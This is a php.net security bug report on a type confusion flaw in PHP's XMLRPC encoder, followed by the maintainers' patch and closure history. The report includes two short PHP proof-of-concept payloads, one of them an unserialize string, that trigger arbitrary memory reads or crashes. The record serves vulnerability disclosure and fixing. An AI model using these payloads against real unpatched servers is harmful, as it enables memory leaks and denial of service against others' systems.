php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #70728 Type Confusion Vulnerability in PHP_to_XMLRPC_worker()
Submitted: 2015-10-16 16:46 UTC Modified: 2016-01-06 03:18 UTC
From: taoguangchen at icloud dot com Assigned: jpauli (profile)
Status: Closed Package: XMLRPC-EPI related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2015-10-16 16:46 UTC] taoguangchen at icloud dot com 
Description:
------------
Type Confusion Vulnerability in PHP_to_XMLRPC_worker()

```
static XMLRPC_VALUE PHP_to_XMLRPC_worker (const char* key, zval* in_val, int depth TSRMLS_DC)
{
	XMLRPC_VALUE xReturn = NULL;

	if (in_val) {
		zval* val = NULL;
		XMLRPC_VALUE_TYPE type = get_zval_xmlrpc_type(in_val, &val);
	
		if (val) {
			switch (type) {
				case xmlrpc_base64:
					if (Z_TYPE_P(val) == IS_NULL) {
						xReturn = XMLRPC_CreateValueEmpty();
						XMLRPC_SetValueID(xReturn, key, 0);
					} else {
						xReturn = XMLRPC_CreateValueBase64(key, Z_STRVAL_P(val), Z_STRLEN_P(val));
					}
					break;
				case xmlrpc_datetime:
					convert_to_string(val);
					xReturn = XMLRPC_CreateValueDateTime_ISO8601(key, Z_STRVAL_P(val));
					break;
...
XMLRPC_VALUE_TYPE get_zval_xmlrpc_type(zval* value, zval** newvalue) /* {{{ */
{
	XMLRPC_VALUE_TYPE type = xmlrpc_none;
	TSRMLS_FETCH();

	if (value) {
		switch (Z_TYPE_P(value)) {
			...
			case IS_OBJECT:
				{
					zval** attr;
					type = xmlrpc_vector;

					if (zend_hash_find(Z_OBJPROP_P(value), OBJECT_TYPE_ATTR, sizeof(OBJECT_TYPE_ATTR), (void**) &attr) == SUCCESS) {
						if (Z_TYPE_PP(attr) == IS_STRING) {
							type = xmlrpc_str_as_type(Z_STRVAL_PP(attr));
						}
					}
					break;
				}
		}

		/* if requested, return an unmolested (magic removed) copy of the value */
		if (newvalue) {
			zval** val;

			if ((type == xmlrpc_base64 && Z_TYPE_P(value) != IS_NULL) || type == xmlrpc_datetime) {
				if (zend_hash_find(Z_OBJPROP_P(value), OBJECT_VALUE_ATTR, sizeof(OBJECT_VALUE_ATTR), (void**) &val) == SUCCESS) {
					*newvalue = *val;
				}
			} else {
				*newvalue = value;
			}
		}
```

an attacker can control type and val via get_zval_xmlrpc_type() with a crafted object-type ZVAL, then the Z_STRVAL_P macro and the Z_STRLEN_P macro handles a non-string-type val is able to looking up an arbitrary memory address, this result in leaking arbitrary memory blocks, crash PHP or other issues.

PoC1:
```
$obj = new stdClass;
$obj->xmlrpc_type = 'base64';
$obj->scalar = 0x1122334455;
var_dump(xmlrpc_encode($obj));
```

PoC2:
```
$obj = unserialize('O:8:"stdClass":2:{s:11:"xmlrpc_type";s:6:"base64";s:6:"scalar";R:1;}');
var_dump(xmlrpc_encode($obj));
```

Patches

julien (last revision 2015-12-22 13:21 UTC by jpauli@php.net)

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-12-22 13:21 UTC] jpauli@php.net 
The following patch has been added/updated:

Patch Name: julien
Revision:   1450790517
URL:        https://bugs.php.net/patch-display.php?bug=70728&patch=julien&revision=1450790517
 [2015-12-22 13:22 UTC] jpauli@php.net
-Status: Open +Status: Assigned -Assigned To: +Assigned To: jpauli
 [2015-12-22 13:22 UTC] jpauli@php.net 
I attached a patch.
Could you please try it and report ?
 [2015-12-22 13:32 UTC] taoguangchen at icloud dot com 
I don't have access to this patch.
 [2015-12-22 15:37 UTC] jpauli@php.net
-Status: Assigned +Status: Feedback
 [2015-12-23 00:29 UTC] taoguangchen at icloud dot com
-Status: Feedback +Status: Assigned
 [2015-12-23 00:29 UTC] taoguangchen at icloud dot com 
@jpauli

hi, i don't have permission to access this patch.
 [2015-12-28 22:23 UTC] stas@php.net 
in security repo as 4df84a648ec62b17bd8f8359452f8defd1026167
 [2016-01-06 03:18 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-01-06 03:18 UTC] stas@php.net 
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-01-06 03:38 UTC] stas@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4df84a648ec62b17bd8f8359452f8defd1026167
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ef4449a8e822ff6bfee96dbe48a64f6b43dcf040
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4df84a648ec62b17bd8f8359452f8defd1026167
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ef4449a8e822ff6bfee96dbe48a64f6b43dcf040
Log: Fixed #70728
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4df84a648ec62b17bd8f8359452f8defd1026167
Log: Fixed #70728
 [2016-01-06 06:35 UTC] ab@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f3c1863aa2721343245b63ac7bd68cfdc3dd41f3
Log: Fixed #70728
 [2016-02-02 10:36 UTC] korvin1986 at gmail dot com 
Hello, 
is any CVE-ID for this vulnerability.
Or I have to request it at http://www.cve.mitre.org ?
 [2016-07-20 11:34 UTC] davey@php.net 
Automatic comment on behalf of jpauli
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ef4449a8e822ff6bfee96dbe48a64f6b43dcf040
Log: Fixed #70728
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 14:01:29 2024 UTC